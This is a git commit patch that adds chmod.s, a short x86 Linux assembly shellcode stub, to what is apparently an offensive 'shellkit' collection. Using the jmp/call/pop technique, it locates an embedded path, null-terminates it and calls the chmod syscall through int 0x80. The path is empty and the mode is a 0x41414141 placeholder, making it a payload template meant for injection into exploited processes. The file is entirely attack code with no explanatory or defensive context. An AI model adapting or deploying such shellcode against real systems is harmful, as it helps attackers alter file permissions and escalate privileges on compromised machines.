From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- other/shellkit/x86_linux/chmod.s | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 other/shellkit/x86_linux/chmod.s (limited to 'other/shellkit/x86_linux/chmod.s') diff --git a/other/shellkit/x86_linux/chmod.s b/other/shellkit/x86_linux/chmod.s new file mode 100644 index 0000000..63efd8b --- /dev/null +++ b/other/shellkit/x86_linux/chmod.s @@ -0,0 +1,23 @@ + + .globl cbegin + .globl cend + + +cbegin: + jmp file + +chmod: + xorl %eax, %eax + popl %ebx + movb %al, 0x4(%ebx) + movl $0x41414141, %ecx + + movb $0xf, %al + int $0x80 + +file: + call chmod + .ascii "" + +cend: + -- cgit v1.3